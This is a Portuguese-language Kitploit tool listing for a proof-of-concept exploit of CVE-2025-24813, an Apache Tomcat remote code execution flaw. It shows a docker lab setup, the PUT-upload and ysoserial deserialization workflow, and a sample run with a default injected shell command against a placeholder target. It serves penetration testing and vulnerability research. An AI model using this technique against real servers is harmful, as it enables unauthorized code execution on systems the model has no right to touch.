Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-24813 — Script de Prova de Conceito (PoC) para CVE-2025-24813, vulnerabilidade no Apache Tomcat. | Kitploit
Ferramentas/GitHubGitHub/hakankarabacak/cve-2025-24813
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubhakankarabacak/cve-2025-24813

CVE-2025-24813

Script de Prova de Conceito (PoC) para CVE-2025-24813, vulnerabilidade no Apache Tomcat.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-24813

Script de Prova de Conceito (PoC) para CVE-2025-24813, vulnerabilidade no Apache Tomcat.

O script foi modificado com base no link relacionado e adaptado às minhas necessidades.

Configurar Ambiente Tomcat Vulnerável

Ambiente baseado na imagem oficial do Tomcat 9.0.90. Ele remove a restrição de somente leitura do servidor e o configura para salvar os dados de sessão em disco. Em seguida, implanta automaticamente o aplicativo copiando o arquivo ROOT.war para o diretório webapps/ do Tomcat.

root@kitploit:~
docker build -t cve-2025-24813 .
docker run --name cve-2025-24813 -it -d -p 8080:8080 cve-2025-24813

Fluxo de Trabalho

  1. Um arquivo check.txt com o cabeçalho Content-Range é colocado para verificar se o servidor está aceitando requisições PUT.
  2. Se o servidor estiver gravável, um payload para o comando desejado é gerado usando ysoserial.
  3. O arquivo de sessão malicioso é enviado para o diretório por meio de uma requisição PUT, vinculando-o ao ID de sessão e ao Nome do arquivo.
  4. Uma requisição GET é enviada com um JSESSIONID personalizado, acionando a desserialização.
  • O arquivo de payload temporário é removido do diretório.
  • Uso

    root@kitploit:~
    $ python3 cve_2025_24813.py
    
    ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ███████╗      ██████╗ ██╗  ██╗ █████╗  ██╗██████╗
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔════╝      ╚════██╗██║  ██║██╔══██╗███║╚════██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗ █████╔╝███████║╚█████╔╝╚██║ █████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ╚════██║██╔══██╗ ██║ ╚═══██╗
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗███████║      ███████╗     ██║╚█████╔╝ ██║██████╔╝
    ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚══════╝      ╚══════╝     ╚═╝ ╚════╝  ╚═╝╚═════╝
     
                     --- Apache Tomcat Remote Code Execution PoC by Hakan Karabacak ---
    
    Enter target URL (e.g., http://target.com:8080): http://target.com:8080
    Enter command to execute (default: bash -c echo${IFS}$(id)>/tmp/RCE): 
    Enter path to ysoserial.jar (default: ysoserial.jar): 
    Enter ysoserial gadget chain (default: CommonsCollections6): 
    [*] Session ID: hk1337
    [+] Server is writable via PUT: http://target.com:8080/check.txt
    [*] Generating ysoserial payload for command: bash -c echo${IFS}$(id)>/tmp/RCE
    [+] Payload generated successfully: payload.ser
    [+] Payload uploaded with status 409 (Conflict): http://target.com:8080/hk1337.session
    [+] Exploit succeeded! Server returned 500 after deserialization.
    [+] Target http://target.com:8080 is vulnerable to CVE-2025-24813!
    [+] Temporary file removed: payload.ser
    

    PoC

    https://github.com/user-attachments/assets/5a271e6f-1126-459a-852b-603f39a68616

    Baixar ferramenta